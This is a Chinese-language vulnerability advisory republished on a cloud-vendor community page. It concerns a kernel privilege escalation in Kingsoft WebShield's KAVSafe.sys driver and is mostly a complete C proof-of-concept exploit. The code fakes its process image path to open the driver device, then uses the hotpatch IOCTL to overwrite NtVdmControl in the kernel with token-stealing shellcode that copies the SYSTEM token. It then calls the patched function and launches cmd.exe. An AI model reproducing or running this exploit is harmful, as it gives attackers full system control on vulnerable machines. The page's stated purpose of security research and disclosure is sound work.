首頁 > 其他

金山網盾爆出本地提權漏洞

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!
Kingsoft WebShield KAVSafe.sys <=
2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation
VulnerabilitySSV ID:WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local
Privilege Escalation Vulnerability" href="http://sebug.net/vulndb/19676/" target="_blank">19676SEBUG-Appdir:金山(Kingsoft)發布時間:2010-05-23資訊提交:yicong2010

(yicong2010_at_yahoo.com)

影響版本: 
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)

Signature Date: 2010-5-23 2:33:54

And

KAVSafe.sys <= 2010.4.14.609
Signature Date:2010-4-14 13:42:26
漏洞描述: 
Kavsafe.sys create a device called DeviceKAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data
<*參考

none

*>測試方法:

[www.sebug.net]

本站提供者(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

 

#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)<br />typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(<br /> HANDLE ProcessHandle,<br /> DWORD ProcessInformationClass,<br /> PVOID ProcessInformation,<br /> ULONG ProcessInformationLength,<br /> PULONG ReturnLength<br /> );<br />typedef struct _STRING {<br /> USHORT Length;<br /> USHORT MaximumLength;<br /> PCHAR Buffer;<br />} STRING;<br />typedef STRING *PSTRING;<br />typedef struct _RTL_DRIVE_LETTER_CURDIR {<br /> USHORT Flags;<br /> USHORT Length;<br /> ULONG TimeStamp;<br /> STRING DosPath;<br />} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;<br />typedef struct _UNICODE_STRING {<br /> USHORT Length;<br /> USHORT MaximumLength;<br /> PWSTR Buffer;<br />} UNICODE_STRING;<br />typedef UNICODE_STRING *PUNICODE_STRING;<br />typedef const UNICODE_STRING *PCUNICODE_STRING;<br />#define RTL_MAX_DRIVE_LETTERS 32<br />#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001<br />typedef struct _CURDIR {<br /> UNICODE_STRING DosPath;<br /> HANDLE Handle;<br />} CURDIR, *PCURDIR;<br />typedef struct _RTL_USER_PROCESS_PARAMETERS {<br /> ULONG MaximumLength;<br /> ULONG Length;</p><p> ULONG Flags;<br /> ULONG DebugFlags;</p><p> HANDLE ConsoleHandle;<br /> ULONG ConsoleFlags;<br /> HANDLE StandardInput;<br /> HANDLE StandardOutput;<br /> HANDLE StandardError;</p><p> CURDIR CurrentDirectory; // ProcessParameters<br /> UNICODE_STRING DllPath; // ProcessParameters<br /> UNICODE_STRING ImagePathName; // ProcessParameters<br /> UNICODE_STRING CommandLine; // ProcessParameters<br /> PVOID Environment; // NtAllocateVirtualMemory</p><p> ULONG StartingX;<br /> ULONG StartingY;<br /> ULONG CountX;<br /> ULONG CountY;<br /> ULONG CountCharsX;<br /> ULONG CountCharsY;<br /> ULONG FillAttribute;</p><p> ULONG WindowFlags;<br /> ULONG ShowWindowFlags;<br /> UNICODE_STRING WindowTitle; // ProcessParameters<br /> UNICODE_STRING DesktopInfo; // ProcessParameters<br /> UNICODE_STRING ShellInfo; // ProcessParameters<br /> UNICODE_STRING RuntimeData; // ProcessParameters<br /> RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];<br />} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;<br />typedef struct _PEB {<br /> BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the<br /> BOOLEAN ReadImageFileExecOptions; //<br /> BOOLEAN BeingDebugged; //<br /> BOOLEAN SpareBool; //<br /> HANDLE Mutant; // INITIAL_PEB structure is also updated.</p><p> PVOID ImageBaseAddress;<br /> PVOID Ldr;<br /> struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;<br />} PEB, *PPEB;<br />typedef LONG KPRIORITY;<br />typedef struct _PROCESS_BASIC_INFORMATION {<br /> LONG ExitStatus;<br /> PVOID PebBaseAddress;<br /> ULONG_PTR AffinityMask;<br /> KPRIORITY BasePriority;<br /> ULONG_PTR UniqueProcessId;<br /> ULONG_PTR InheritedFromUniqueProcessId;<br />} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;<br />typedef struct {<br /> ULONG Unknown1;<br /> ULONG Unknown2;<br /> PVOID Base;<br /> ULONG Size;<br /> ULONG Flags;<br /> USHORT Index;<br /> USHORT NameLength;<br /> USHORT LoadCount;<br /> USHORT PathLength;<br /> CHAR ImageName[256];<br />} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;<br />typedef struct {<br /> ULONG Count;<br /> SYSTEM_MODULE_INFORMATION_ENTRY Module[1];<br />} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;<br />typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (<br /> LONG SystemInformationClass,<br /> PVOID SystemInformation,<br /> ULONG SystemInformationLength,<br /> PULONG ReturnLength<br /> );<br />#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )<br />typedef LONG (WINAPI *PNT_VDM_CONTROL) (<br /> ULONG Service,<br /> PVOID ServiceData<br /> );<br />VOID __declspec(naked) R0ShellCodeXP()<br />{<br />__asm<br />{<br />mov eax,0xffdff124<br />mov eax,[eax]<br />mov esi ,dword ptr[eax+0x220]<br />mov eax,esi<br />searchxp:<br />mov eax,dword ptr[eax+0x88]<br />sub eax,0x88<br />mov edx,dword ptr[eax+0x84]<br />cmp edx,4<br />jnz searchxp<br />mov eax,dword ptr[eax+0xc8]<br />mov dword ptr[esi + 0xc8] , eax<br />ret 8<br />}<br />}<br />VOID NopNop()<br />{<br />printf("nop!/n");<br />}<br />#include "malloc.h"<br />int main(int argc, char* argv[])<br />{<br />printf("KSWebShield KAVSafe.sys <= 2010,04,14,609/n"<br />"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept/n"<br />"2010-5-23/n"<br />"By Lincoin /n/nPress Enter");<br />HKEY hkey ;<br />WCHAR InstallPath[MAX_PATH];<br />DWORD datatype ;<br />DWORD datasize = MAX_PATH * sizeof(WCHAR);<br />ULONG oldlen ;<br />PVOID pOldBufferData = NULL ;<br />if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE//Kingsoft//KSWSVC", &hkey) == ERROR_SUCCESS)<br />{<br />if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)<br />{<br />RegCloseKey(hkey);<br />printf("KSWebShield not installed/n");<br />getchar();<br />return 0 ;<br />}<br />RegCloseKey(hkey);<br />}<br />else<br />{<br />printf("KSWebShield not installed/n");<br />getchar();<br />return 0 ;<br />}<br />wcscat(InstallPath , L"//kavinst.exe");</p><p>PROCESS_BASIC_INFORMATION pbi ;<br />PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;</p><p>pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");</p><p>pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);<br />PPEB peb ;<br />peb = (PPEB)pbi.PebBaseAddress;<br />oldlen = peb->ProcessParameters->ImagePathName.Length;<br />peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);<br />pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);<br />RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);<br />RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );<br />HANDLE hdev = CreateFile("////.//KAVSafe" ,<br />FILE_READ_ATTRIBUTES ,<br />FILE_SHARE_READ ,<br />0,<br />OPEN_EXISTING ,<br />0,<br />0);<br />if (hdev==INVALID_HANDLE_VALUE)<br />{<br />printf("cannot open device %u/n", GetLastError());<br />getchar();<br />return 0 ;<br />}<br />RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);<br />peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ; </p><p>PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation ;<br />pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");<br />X_SYSTEM_MODULE_INFORMATION sysmod ;<br />HMODULE KernelHandle ;<br />pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);</p><p> KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '//') + 1);</p><p>if (KernelHandle == 0 )<br />{<br />printf("cannot load ntoskrnl!/n");<br />getchar();<br />return 0 ;<br />}<br />PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");<br />if (pNtVdmControl == 0 )<br />{<br />printf("cannot find NtVdmControl!/n");<br />getchar();<br />return 0 ;<br />}<br />pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle );<br />printf("NtVdmControl = %08x" , pNtVdmControl );</p><p>getchar();<br />ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;<br />ULONG pShellCode = (ULONG)R0ShellCodeXP; </p><p>PVOID Data = malloc(0x48 + ShellCodeSize);<br />CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);</p><p>CHAR ModuleName[68]= "ntoskrnl.exe" ;<br />RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));<br />*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;<br />*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;</p><p>ULONG btr ;<br />if (!DeviceIoControl(hdev ,<br />IOCTL_HOTPATCH_KERNEL_MODULE ,<br />Data ,<br />0x48 + ShellCodeSize ,<br />NULL ,<br />0,<br />&btr , 0<br />))<br />{<br />printf("cannot device io control!%u/n" , GetLastError());<br />getchar();<br />return 0;<br />}<br />CloseHandle(hdev);<br />PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");<br />pR3NtVdmControl(0,0);</p><p>WinExec("cmd.exe" , SW_SHOW);<br />printf("OK!/n ");<br />getchar();<br />return 0;<br />}<br />

 

原文地址:http://sebug.net/vulndb/19676/

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More